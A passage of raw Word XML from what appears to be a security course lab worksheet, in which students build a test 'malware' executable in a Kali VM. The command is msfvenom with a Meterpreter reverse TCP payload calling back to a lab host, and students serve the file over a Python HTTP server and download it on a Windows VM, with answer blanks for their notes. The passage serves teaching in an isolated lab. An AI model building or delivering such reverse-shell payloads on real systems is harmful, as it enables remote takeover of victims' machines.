          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Part 4: Create a simple Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000052" w14:textId="37292EEA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this section, we will generate a simple malware attack to make sure that our environment is ready.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="2B361AEC" w14:paraId="00000053" w14:textId="4423B81A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open a terminal in your Kali VM, and create a new directory named ‘malware’ .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000054" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="72D30597" w14:textId="37893CC8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=10.0.0.1 -f exe &gt; malware/test-malware.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000056" w14:textId="14F76C37">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You can safely ignore the warnings. This command creates an .exe file named ‘test-malware’ with a virus.  The ‘-p’ flag specifies the payload that the malware will deliver to the victim; in this case, a reverse TCP shell.  The `-f’ flag specifies the file type created.  The `LHOST’ flag specifies, in this case, the IP address of the machine the payload will try to connect *to* when serving the reverse shell from the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000057" w14:textId="5BB52F66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Briefly summarize what </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is and what it is used for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="47792B4D" w14:textId="23A4A1BD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="0"/>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0CA8FBEF" w14:textId="699234C5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>YOUR ANSWER HERE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="719EF4A0" w14:textId="72554FCC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="115EFDCC" w14:textId="23A4A1BD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="0"/>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736B306C" w14:textId="664486F4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000058" w14:textId="1AE5F98E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Still on the Kali VM, type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00754143" w14:paraId="6F2AB927" w14:textId="52574283">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="04486216" w:rsidR="2B361AEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 –m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="2B361AEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="2B361AEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00754143" w14:paraId="0000005A" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This command starts an HTTP server with the current directory as its root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="0000005B" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to your Windows VM, open a browser, and type </w:t>
      </w:r>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://10.0.0.1:8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="0000005C" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Can you explain what you see?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="47649F2D" w14:textId="4E0823F3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>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1A81B154" w14:textId="7AF14664">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PLEASE EXPLAIN HERE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="34B30803" w14:textId="15CCD78D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="1C5FE555" w14:textId="4E0823F3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>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298460F4" w14:textId="75E389B1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="2B361AEC" w14:paraId="0000005D" w14:textId="60B6885F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Navigate to the “malware” folder (while still in your Windows VM), and download the test malware. Does it work? If not, why? Document any steps required to enable the download.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="37456C8E" w14:textId="4E0823F3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>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5BFAED91" w14:textId="450F9B85">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>STEPS TAKEN:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="33EB040C" w14:textId="15CCD78D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="00EA565B" w14:textId="4E0823F3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>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5595073D" w14:textId="5502AB57">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="2B361AEC" w14:paraId="49F47D3C" w14:textId="74EF6ECF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Take a snapshot of your VM if your hypervisor has that capability, and if so, please include the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="2B361AEC" w14:paraId="00000060" w14:textId="3A5ACBC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Take a screenshot of a successful download of the malware to your Windows VM and include it below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="53B05872" w14:textId="4E0823F3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>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4F0F0EDC" w14:textId="4E7041EC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PASTE SCREENSHOTS HERE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="4C696F0F" w14:textId="15CCD78D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="060F3F98" w14:textId="4E0823F3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>===========================================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="6FAD2156" w14:textId="3AC0C784">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="00000061" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="2B361AEC" w14:paraId="00000062" w14:textId="0525D724">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In the future, we will use this malware to simulate and analyze a simple attack on our Windows VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="00000063" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000064" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Optional:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="1A0E472A" w:rsidRDefault="00754143" w14:paraId="00000068" w14:textId="504B7601">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="04486216">
        <w:rPr/>
        <w:t>If you would like to see a sneak preview of the malware in action, you may do so using the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="1308375A" w14:textId="3F6545D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
